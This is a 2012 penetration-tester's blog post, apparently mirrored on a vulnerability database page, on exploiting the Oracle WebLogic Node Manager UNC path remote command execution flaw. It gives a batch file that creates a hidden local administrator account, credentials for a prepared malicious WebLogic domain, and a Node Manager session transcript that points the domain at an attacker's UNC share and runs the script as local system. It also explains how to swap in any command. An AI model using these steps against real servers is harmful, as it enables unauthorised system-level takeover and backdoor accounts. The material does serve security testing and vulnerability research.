`Oracle Web Logic Node Manager UNC Path Remote File Execution
Posted by admin on 2012/03/16 Leave a comment (0) Go to comments
Keep running into old Web Logic installations which have the file traversal (http://www.securityfocus.com/bid/37926/info) and UNC path remote command execution (http://www.kb.cert.org/vuls/id/924300) vulns in them.
The file traversal one is rubbish as you canât specify any command line arguments AFAIK (Do tell me if Iâm wrong, please).
The UNC one requires you have a web logic domain accessible via a UNC path. Too much of a pain in the arse to do in middle of a test. Could not find one online, so I downloaded an older version of web logic, and setup a little wl domain with a little batch file to run the followingâŚ
@ECHO OFF
net user /add wlcetest WLCETest99*
net localgroup administrators /add wlcetest
The username and password for the wl domain is weblogic / w3bl0g1c.
Download it here. Itâs for 10.3.2, no idea if itâll work on other versions of WebLogic.
Here it is in action..
user@host:~$ openssl s_client -connect 192.168.0.1:5556
CONNECTED(00000003)
<snip>
â
hello
+OK Node manager v10.3 started
domain cetest1 \\192.168.0.2\share
+OK Current domain set to âcetest1â˛
execscript addlocaladmin.bat
+OK Script âaddlocaladmin.batâ executed
Add and modify the batch scripts in bin/service_migration/ to execute any commands you like as local system.
Typically, Nessus doesnt pick the UNC issue up, nor does it pick up the file traversal one if the domain directory structure is sitting on a driver letter other than C:\. This is because its file traversal technique canât find ..\..\..\..\..\..\windows\system32\ipconfig.exe on D:\ E:\ Z:\ or whatever, which is its test case.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation